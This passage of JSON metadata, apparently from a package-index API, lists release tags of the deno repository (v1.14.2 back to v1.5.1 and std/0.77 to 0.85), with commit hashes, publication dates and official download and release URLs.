pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"